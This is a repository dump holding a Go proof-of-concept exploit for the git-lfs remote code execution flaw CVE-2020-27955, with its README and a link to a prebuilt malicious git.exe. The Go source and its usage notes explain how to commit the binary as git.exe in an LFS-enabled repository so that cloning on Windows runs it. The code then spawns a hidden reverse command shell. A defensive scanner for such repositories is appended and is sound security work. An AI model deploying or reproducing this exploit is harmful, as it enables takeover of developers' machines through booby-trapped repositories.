├── README.md
├── git-lfs-RCE-exploit-CVE-2020-27955.go
└── git.exe


/README.md:
--------------------------------------------------------------------------------
# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (Go version)
## Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc.

Discovered by **Dawid Golunski**
* https://legalhackers.com
* https://exploitbox.io

Tested on Windows on:

git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc.

Basically, the whole Windows dev world ;)

Check out the full advisories for details and patch information:

* https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html
* https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html

Video PoC:
* https://youtu.be/tlptOf9w274

There's also a BAT / PowerShell version of this exploit in a repo with LFS enabled already:
* https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955

https://exploitbox.io
https://twitter.com/Exploit_Box

Stay tuned

--------------------------------------------------------------------------------
/git-lfs-RCE-exploit-CVE-2020-27955.go:
--------------------------------------------------------------------------------
/*
Go PoC exploit for git-lfs - Remote Code Execution (RCE) vulnerability CVE-2020-27955
git-lfs-RCE-exploit-CVE-2020-27955.go

Discovered by Dawid Golunski
https://legalhackers.com
https://exploitbox.io

Affected (RCE exploit):
Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken / SmartGit / SourceTree etc.
Basically the whole Windows dev world which uses git.

Usage:
Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go
Save & commit as git.exe

The payload should get executed automatically on git clone operation.
It spawns a reverse shell, or a calc.exe for testing (if it couldn't connect).

An lfs-enabled repository with lfs files may also be needed so that git-lfs
gets invoked. This can be achieved with:

git lfs track "*.dat"
echo "fat bug file" > lfsdata.dat
git add .*
git add *
git commit -m 'git-lfs exploit' -a

Check out the full advisory for details:

https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html
or the PoC video at:
https://youtu.be/tlptOf9w274

https://ExploitBox.io

https://twitter.com/Exploit_Box

** For testing purposes only **
*/

package main

import (
	"bufio"
	"net"
	"os/exec"
	"syscall"
)

func revsh(host string) {

	c, err := net.Dial("tcp", host)
	if nil != err {
		// Conn failed
		if nil != c {
			c.Close()
		}
		// Calc for testing purposes if no listener available
		cmd := exec.Command("calc")
		cmd.Run()
		return
	}

	// Read newline-terminated commands from the connection and write back their output
	r := bufio.NewReader(c)
	for {
		runcmd, err := r.ReadString('\n')
		if nil != err {
			c.Close()
			return
		}
		cmd := exec.Command("cmd", "/C", runcmd)
		cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
		out, _ := cmd.CombinedOutput()
		c.Write(out)
	}
}

// Connect to netcat listener on local port 1337
func main() {
	revsh("localhost:1337")
}

--------------------------------------------------------------------------------
/git.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go/4aa9cdea3b037982150fc3dcc2ad60914901cf96/git.exe
--------------------------------------------------------------------------------
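
A defensive counterpart to the usage notes above, as an added example that is not part of the original repository: it checks a repository's top-level directory for the two conditions those notes describe, a file named `git` with a Windows executable extension and a `.gitattributes` entry that routes files through the LFS filter. The names `ScanRepoRoot`, `Finding` and `pathExt` are hypothetical, and the extension list assumes the default Windows `PATHEXT`.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Assumed default Windows PATHEXT: a root-level git.<ext> can shadow the real "git".
var pathExt = map[string]bool{".com": true, ".exe": true, ".bat": true, ".cmd": true, ".vbs": true, ".vbe": true, ".js": true, ".jse": true, ".wsf": true, ".wsh": true, ".msc": true}

// Finding summarises what a scan of a repository's top-level directory saw.
type Finding struct {
	ShadowGit []string // root-level files that would shadow "git"
	UsesLFS   bool     // .gitattributes sends some path through the lfs filter
}

// Suspicious is true when both conditions from the PoC's usage notes hold.
func (f Finding) Suspicious() bool { return len(f.ShadowGit) > 0 && f.UsesLFS }

// ScanRepoRoot (hypothetical helper) inspects only the top-level directory of dir.
func ScanRepoRoot(dir string) (Finding, error) {
	var f Finding
	entries, err := os.ReadDir(dir)
	if err != nil {
		return f, err
	}
	for _, e := range entries {
		name := strings.ToLower(e.Name()) // Windows file names are case-insensitive
		ext := filepath.Ext(name)
		if !e.IsDir() && strings.TrimSuffix(name, ext) == "git" && pathExt[ext] {
			f.ShadowGit = append(f.ShadowGit, e.Name())
		}
	}
	// "git lfs track" records patterns as "<pattern> filter=lfs diff=lfs merge=lfs -text".
	attrs, _ := os.ReadFile(filepath.Join(dir, ".gitattributes")) // missing file: no LFS
	for _, line := range strings.Split(string(attrs), "\n") {
		if !strings.HasPrefix(strings.TrimSpace(line), "#") && strings.Contains(line, "filter=lfs") {
			f.UsesLFS = true
		}
	}
	return f, nil
}

func main() {
	f, err := ScanRepoRoot(".")
	fmt.Println(f.ShadowGit, f.UsesLFS, f.Suspicious(), err)
}
```

Run it against a tree obtained on a patched or non-Windows host, such as a CI mirror, so the check happens before a Windows client clones the repository.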